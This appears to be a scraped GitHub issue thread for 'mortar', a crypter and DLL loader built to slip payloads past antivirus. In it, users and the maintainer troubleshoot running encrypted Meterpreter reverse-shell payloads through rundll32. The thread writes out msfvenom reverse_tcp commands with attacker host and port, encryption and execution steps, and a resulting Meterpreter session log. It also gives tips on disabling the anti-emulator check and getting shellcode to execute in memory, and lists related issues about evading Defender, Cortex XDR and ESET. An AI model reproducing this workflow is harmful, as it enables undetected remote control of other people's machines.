Comments (30)
Its working for https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc but not for other payloads encrypted with the crypter
from mortar.
it works fine with me, make sure you have compiled the DLL correctly and place the bin.enc in the same folder
from mortar.
i would advise you first to use the following mimikatz first to test if agressor.dll is compiled correctly https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins, if mimikatz works, maybe some issue on your msfvenom payload which is fine on my side
from mortar.
it works fine with me, make sure you have compiled the DLL correctly and place the bin.enc in the same folder
How can I double check that the DLL compiled correctly?
It seems to compile, with some errors...
from mortar.
i would advise you first to use the following mimikatz first to test if agressor.dll is compiled correctly https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins, if mimikatz works, maybe some issue on your msfvenom payload which is fine on my side
I renamed mimikatz.enc to bin.enc, dropped it in the current working directory with agressor.dll, and ran rundll32.exe agressor.dll,start
and rundll32.exe agressor.dll,sh
Both don't work. So, perhaps I'm not compiling agressor.dll properly. Everything seems to compile fine, how can I verify?
from mortar.
are you sure your project config is like that?
from mortar.
I just verified, those are the same settings I have.
Windows Application logs shows Event ID 1000 errors.
Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b
Exception code: 0xe0465043
Fault offset: 0x0000000000034fd9
Faulting process id: 0x71c
Faulting application start time: 0x01d86f86ae713c8e
Faulting application path: C:\Windows\system32\rundll32.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: ede56f0a-c881-4752-bfc8-9c112894e97e
Faulting package full name:
Faulting package-relative application ID:
from mortar.
in order to see why that's happening on your system, let's try shellcode load not the PE
msfvenom -p payload -lhost -lport -f c -o shellcode.bin
and then ecnrypt it, then place the bin.enc with aggressor and execute only agressor.sh
from mortar.
in order to see why that's happening on your system, let's try shellcode load not the PE msfvenom -p payload -lhost -lport -f c -o shellcode.bin and then ecnrypt it, then place the bin.enc with aggressor and execute only agressor.sh
Workflow:
root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 -f c -o shell.c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
Saved as: shell.c
C:\Users\user\Documents\GitHub\mortar\Encryptor>encryptor.exe -f \Users\user\Desktop\shell.c -o Users\user\Desktop\bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a
[+] Encrypting the binary ...
[!] content is written to \Users\user\Desktop\bin.enc
C:\Users\user\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 749B-11F1
Directory of C:\Users\user\Desktop
05/24/2022 08:52 AM <DIR> .
05/24/2022 08:52 AM <DIR> ..
05/24/2022 08:55 AM 850,928 agressor.dll
05/24/2022 09:06 AM 2,888 bin.enc
05/24/2022 10:51 PM 2,166 shell.c
Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,start
Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh
from mortar.
I will do the test on all matching OS with a clean system run. if the issue working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now
from mortar.
I will do the test on all matching OS with a clean system run. if the issue working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now
Okay! I'm using libvirt kvm/qemu as a hypervisor. (https://libvirt.org/drvqemu.html)
from mortar.
yup that's clear now, i have anti-emulator technique(could some memory allocation), so better to try regular PC or VMs
from mortar.
yup that's clear now, i have anti-emulator technique(could some memory allocation), so better to try regular PC or VMs
It is a VM though... What would be the difference between a VM on VirtualBox or VMWare Workstation vs what I'm using now?
from mortar.
I think that could be (not 100% sure) due to aggressor.dll not being able to allocate memory correctly, so for example in order to divert the AV emulator, the aggressor will try to see if can allocate or not, if not then exit, and I feel that's what happened in your case if you wanna make sure try to remove the following line and retest again
https://github.com/0xsp-SRD/mortar/blob/main/DLL/agressor.lpr#L188
if isEmulated = true then
exit
else
from mortar.
That didn't help with the crashes
from mortar.
Same results with Windows 7 :(
from mortar.
Small update: I installed and updated Windows 10 on Hyper-V. Removed the isEmulated if-statements, set the compiler options to Win64 and x86_64.
And it still doesn't work.
@lawrenceamer What hypervisor are you using?
from mortar.
try to use the following demo for the test https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc
then agressor.dll,start
from mortar.
@nathan-bowman the issue was that you using an encryptor(windows version) which is not what should be, in order to encrypt the files you have to use the Linux version of the encryptor, you can do that by installing Lazarus on Kali
apt install fpc
apt install Lazarus-ide
after that, you can compile the Encryptor only and use it to encrypt windows binaries
from mortar.
while using Linux encryptor, it should work any x64 payload, or EXE that's not (.NET Assembly), I have tested mortar with Msfvenom,cobalt also works fine
from mortar.
while using Linux encryptor, it should work any x64 payload, or EXE that's not (.NET Assembly), I have tested mortar with Msfvenom,cobalt also works fine
The bin.enc you provide does work for me with the agressor.dll I built. Now, trying my own shell...
Build encryptor:
root@localhost:/opt/mortar/Encryptor# lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
Parameter: recursive
Parameter: os=Linux
Parameter: cpu=x86_64
Hint: (lazarus) primary config path: /root/.lazarus
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="" TargetCPU="" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS= TargetCPU= CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) Build Project: nothing to do.
TCompiler.Compile WorkingDir="/opt/mortar/Encryptor/" CompilerFilename="/usr/bin/fpc" CompilerParams=" -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
[TCompiler.Compile] CmdLine="/usr/bin/fpc -B -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="linux" TargetCPU="x86_64" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS=linux TargetCPU=x86_64 CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP" "-Px86_64" "-Tlinux"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas" "-Px86_64" "-Tlinux"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) TBuildManager.MacroFuncInstantFPCCache /usr/bin/instantfpc
Hint: (lazarus) [RunTool] "/usr/bin/instantfpc" "--get-cache"
Hint: (lazarus) [TBuildManager.MacroFuncInstantFPCCache] /root/.cache/instantfpc/
Info: (lazarus) Execute Title="Compile Project, Target: encryptor"
Info: (lazarus) Working Directory="/opt/mortar/Encryptor/"
Info: (lazarus) Executable="/usr/bin/fpc"
Info: (lazarus) Param[0]="-B"
Info: (lazarus) Param[1]="-Tlinux"
Info: (lazarus) Param[2]="-Px86_64"
Info: (lazarus) Param[3]="-MObjFPC"
Info: (lazarus) Param[4]="-Scghi"
Info: (lazarus) Param[5]="-Cg"
Info: (lazarus) Param[6]="-O1"
Info: (lazarus) Param[7]="-g"
Info: (lazarus) Param[8]="-gl"
Info: (lazarus) Param[9]="-l"
Info: (lazarus) Param[10]="-vewnhibq"
Info: (lazarus) Param[11]="-Fi/opt/mortar/Encryptor/lib/x86_64-linux"
Info: (lazarus) Param[12]="-Fu/opt/mortar/Encryptor/"
Info: (lazarus) Param[13]="-FU/opt/mortar/Encryptor/lib/x86_64-linux/"
Info: (lazarus) Param[14]="-FE/opt/mortar/Encryptor/"
Info: (lazarus) Param[15]="-o/opt/mortar/Encryptor/encryptor"
Info: (lazarus) Param[16]="encryptor.lpr"
Hint: (11030) Start of reading config file /etc/fpc.cfg
Hint: (11031) End of reading config file /etc/fpc.cfg
Free Pascal Compiler version 3.0.4+dfsg-23 [2019/11/25] for x86_64
Copyright (c) 1993-2017 by Florian Klaempfl and others
(1002) Target OS: Linux for x86-64
(3104) Compiling encryptor.lpr
/opt/mortar/Encryptor/encryptor.lpr(101,3) Note: (5025) Local variable "de" not used
/opt/mortar/Encryptor/encryptor.lpr(102,6) Note: (5025) Local variable "s2" not used
/opt/mortar/Encryptor/encryptor.lpr(103,7) Note: (5025) Local variable "temp" not used
/opt/mortar/Encryptor/encryptor.lpr(104,3) Note: (5025) Local variable "i" not used
/opt/mortar/Encryptor/encryptor.lpr(98,10) Warning: (5033) Function result does not seem to be set
/opt/mortar/Encryptor/encryptor.lpr(146,43) Hint: (5091) Local variable "b64_encoded" of a managed type does not seem to be initialized
(9015) Linking /opt/mortar/Encryptor/encryptor
/usr/bin/ld.bfd: warning: /opt/mortar/Encryptor/link.res contains output sections; did you forget -T?
(1008) 173 lines compiled, 0.3 sec
(1021) 1 warning(s) issued
(1022) 3 hint(s) issued
(1023) 4 note(s) issued
[TCompiler.Compile] end
Build reverse shell:
root@localhost:/opt/mortar/Encryptor# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 --platform windows --arch x64 -f exe -o /root/shell64.exe
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /root/shell64.exe
Test from target Win10:
[*] Meterpreter session 121 opened (172.x.x.x:8080 -> x.x.x.x:20099) at 2022-05-27 14:18:57 +0000
Encrypt:
root@localhost:/opt/mortar/Encryptor# ./encryptor -f /root/shell64.exe -o /root/bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a
[+] Encrypting the binary ...
[!] content is written to /root/bin.enc
Both of these fail on target Win10:
C:\Users\user\Desktop>rundll32.exe agressor.dll,start
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh
from mortar.
I have the same issue. It works well with the demo/bin.enc but not with my own payload
from mortar.
it works with meterpreter, at some times you need to execute it 3/4 times to make sure it is being executed on memory,
from mortar.
as I said there are no issues on the mortar side, it is a kind of memory execution delays or could take time to be allocated with executable shellcode or an image, if it fails the first time, execute it 3/4 times to make it work
from mortar.
as I said there are no issues on the mortar side, it is a kind of memory execution delays or could take time to be allocated with executable shellcode or an image, if it fails the first time, execute it 3/4 times to make it work
How exactly are you compiling encryptor?
Like?
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
from mortar.
pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2
from mortar.
pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2
That works! How are you compiling it? I'm using:
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
from mortar.
pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2
That works! How are you compiling it? I'm using:
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
^^^
@lawrenceamer can you post how you are compiling the encryptor?
from mortar.
Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21
from mortar.
Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21
This makes sense, I'll test later. If I don't reply again, it probably means that it worked.
from mortar.
Related Issues (20)
- DLL Error and Defender Detecting Payload HOT 2
- Unable to bypass Cortex XDR HOT 3
- Detected by windows defender HOT 4
- Having issues using. HOT 1
- Inject dll into cmd.exe process and call "dec" function to execute my ".enc" payload. HOT 1
- cobalt strike beacon dies after encryption HOT 6
- Compiling issues HOT 7
- Error: identifier idents no member "rdx" HOT 1
- Agressor.dll doesn't work HOT 4
- The agressor.dll doesn't load the encrypted payload HOT 6
- Compile error HOT 1
- I want to pass command HOT 5
- dll removed by defander
- Stealthier injection HOT 3
- how can i make agressor dll ?
- Applying this technique to other tools HOT 9
- Microsoft defender started detecting HOT 5
- ESET getting flagged HOT 1
- Compile Instructions HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from mortar.